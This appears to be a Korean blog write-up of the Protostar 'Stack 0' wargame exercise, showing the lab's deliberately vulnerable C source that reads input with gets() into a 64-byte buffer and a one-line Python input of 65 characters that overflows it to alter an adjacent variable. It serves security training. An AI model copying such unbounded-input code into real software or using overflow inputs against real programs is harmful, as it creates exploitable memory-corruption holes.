-
Protostar - Stack 0Wargame/Exploit-Exercises 2014. 5. 14. 16:43
1. 문제 Source
#include <stdlib.h> #include <unistd.h> #include <stdio.h> int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } }
2. 풀이
user@protostar:/opt/protostar/bin$ python -c "print 'A'*65" | ./stack0 you have changed the 'modified' variable
'Wargame > Exploit-Exercises' 카테고리의 다른 글
Protostar - Stack 4 (0) 2014.05.15 Protostar - Stack 3 (0) 2014.05.15 Protostar - Stack 2 (0) 2014.05.15 Protostar - Stack 1 (0) 2014.05.15 Protostar 시작 (0) 2014.05.14